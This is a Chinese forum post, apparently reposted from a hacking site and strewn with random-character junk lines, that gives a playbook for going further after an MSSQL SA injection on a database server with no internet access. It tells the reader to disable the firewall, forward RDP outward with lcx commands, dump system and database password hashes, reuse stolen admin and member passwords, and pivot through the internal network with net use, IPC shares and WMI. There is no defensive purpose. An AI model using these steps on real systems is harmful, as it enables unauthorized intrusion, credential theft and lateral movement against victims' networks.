当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
) T3 j' |2 f# \$ P; i/ g. \
5 y* f( b4 \8 x) h1 x( }% l
. n' e7 K/ n- ^0 r: m3 Z
- e, g4 z2 \; QSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
; w% |& ~5 }0 q# S9 C7 n [. l2 Q4 X
" U; d5 B9 ^) y4 L8 N
5 Z* X! u) Q0 B( ~一、DB机有公网IP.& \3 {* Q! l' n9 N+ n1 A1 i
5 q) B4 d, L1 N
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.* T& d7 q: m6 U
6 Z) r6 N$ B4 I8 h" d$ t3 h
% r# X& C0 I3 @2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.( I3 {2 y/ _7 x0 R. q( O
) J- x0 H. \( o1 q( M% E! e2 }! Z n& r, ~; h: G+ n. z8 b
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com$ d8 ]3 K+ K/ I" S5 W5 E6 |
0 g" m" L9 s1 O
/ {$ q2 }" g3 `1 I4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
9 L* v4 \$ l9 S- |; r5 D4 ^8 Q8 V% U2 V! O2 J
. R4 ~- j6 @+ ]% W+ T n" M+ @
$ h8 b2 a# @$ I. l: Y; V9 M( t
二、DB机只有内网IP
% P) m$ g \6 \! a+ V1 q! d3 w) J- a$ d: D: @; ?# q& x
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.' Y7 `4 X$ _) J/ ^& h
. A* b7 Z. d1 n0 q/ W7 O( N9 P2 v
5 r. \/ g; b6 j( N/ ~2:停掉防火墙和IP策略再从内往外扫描.
+ ^. y" t f# f8 M2 P1 @; f+ U% j0 k3 J
' x/ Q& T+ H' |( h: i
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 F& F3 X( T7 y
% a0 I' k$ E( U! j
0 A5 K& m+ I C0 v" y" [
4:学会密码规律分析往往会有惊喜.2 S- F3 ^* H6 L! A# V) t* A
( C: X3 `! u9 s5 L& D$ k
( `! j6 _6 Z) Z; P5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
: H* p: c3 \6 I+ J2 ?% c3 l
8 K+ E. t9 K! r1 e( ^" o; R
* p9 k5 S9 a$ u/ q7 |有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对